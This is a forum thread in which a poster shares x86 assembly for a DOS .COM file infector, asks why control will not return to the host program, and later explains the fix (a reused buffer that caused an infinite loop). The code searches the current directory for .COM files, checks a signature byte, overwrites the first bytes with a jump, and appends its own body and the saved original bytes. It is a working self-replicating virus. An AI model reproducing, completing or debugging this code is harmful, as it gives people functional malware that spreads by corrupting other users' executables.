Re: Infecting COM problem
Ok have been able to solve the problem. But now another problem, can't restore control to original host program. I mean copying 4 bytes back to 100h isn't working. Even appended the 4 bytes at the end of file then read from the file and put to 100h, no use, The read and write bytes are completely different can anybody help ??
Code:
c_seg segment 'code'
org 100h
assume cs:c_seg
main proc near
start_:
; adjust the segments
mov ax, cs
mov ds, ax
mov es, ax
; getting offsets
call fals_proc
fals_proc proc
fals_proc endp
pop bp
sub bp, offset fals_proc
; set DTA
mov ah, 1Ah
lea dx, [bp + offset DTA]
int 21h
; find first file
mov ah, 4eh
lea dx, [bp + offset first_file]
mov cx, 7
int 21h
; preparing full path .\*A.COM
lea di, [bp + offset file_name]
mov byte ptr[di], '.'
inc di
mov byte ptr[di], '\'
inc di
lea si, [bp + offset DTA + 1Eh]
rep movsb
mov byte ptr[di], 0
; open file
mov ah, 3Dh
mov al, 2
lea dx, [bp + offset file_name]
int 21h
; save handle
push ax
push ax
pop bx
pop [bp + fHandle]
; read first four bytes
mov ah, 3Fh
mov cx, 4
lea dx, [bp + offset buffer]
int 21h
; if virus signature matches don't infect just quit
mov al, byte ptr[bp + offset buffer + 3]
mov dl, byte ptr [bp + offset vir_sig]
cmp al, dl
jne jmp_patchin_
mov ah, 3Eh
int 21h
mov ah, 09h
lea dx, [bp + offset infection]
int 21h
cmp bp, 0
je quitzz_
jmp dispatcher_
quitzz_:
mov ah, 4ch
int 21h
jmp_patchin_:
; set file pointer to begin
mov ax, 4200h
mov cx, 0
mov dx, 0
int 21h
; ===== the jump patch =====
mov byte ptr[bp + jmp_patch], 0E9h
mov ax, word ptr[bp + offset DTA + 1Ah] ; the file size
sub ax, 3
mov word ptr[bp + jmp_patch + 1], ax
mov al, vir_sig
mov byte ptr[bp + jmp_patch + 3], al
mov ah, 40h
mov cx, 4
lea dx, [bp + offset jmp_patch]
int 21h
; append the virus
mov ax, 4202h
mov cx, 0
mov dx, 0
int 21h
mov ah, 40h
mov cx, offset end_vir - offset main
lea dx, [bp + offset main]
int 21h
; append the first 4 byte too
mov ax, 4202h
mov cx, 0
mov dx, 0
int 21h
mov ah, 40h
lea dx, [bp + offset buffer]
mov cx, 4
int 21h
mov ah, 3eh
int 21h
dispatcher_:
mov ah, 3Dh
mov al, 02h
lea dx, [bp + offset file_name]
int 21h
mov bx, ax
mov ax, 4202h
mov cx, 0
mov dx, 0
int 21h
; restore the first 4 bit
mov ah, 3Fh
lea dx, [bp + offset buffer]
mov cx, 4
int 21h
mov cx, 4
lea si, [bp + offset buffer]
mov di, 100h
rep movsb
mov ah, 09h
lea dx, [bp + offset infection]
int 21h
mov di, 100h
mov cx, 4
loop_1:
mov ah, 02h
mov dl, byte ptr[di]
int 21h
loop loop_1
lea di, [bp + offset buffer]
mov cx, 4
loop_2:
mov ah, 02h
mov dl, byte ptr[di]
int 21h
loop loop_2
;mov ah, 01
;int 21h
; close
mov ah, 3Eh
int 21h
mov ax, 0100h
jmp ax
;quit_:
; mov ah, 4ch
; int 21h
DTA db 43 dup (?)
first_file db '.\*.COM', 0
file_name db 255 dup (?)
extra_buffer db 20 dup (?)
fHandle dw ?
buffer db 4 dup (0)
jmp_patch db 4 dup (0)
infection db "Hello World$"
vir_sig db 'Y'
main endp
end_vir label near
c_seg ends
end start_
Re: Infecting COM problem
Solved it guyz.. here is what was happening...
i saved the first 4 bytes to buffer.
now when i was reading 4 bytes for checking prior infection, i was again reading in buffer. this time buffer was full with the jump patcher and virus signature. then in runtime i was overwriting first 4 byte code with buffer, the same thing - the jump patcher - this caused an infinite loop. while checking for prior infection i read the 4 byte in seperate buffer, that solved the prob guyz.. thanx anyway. :D
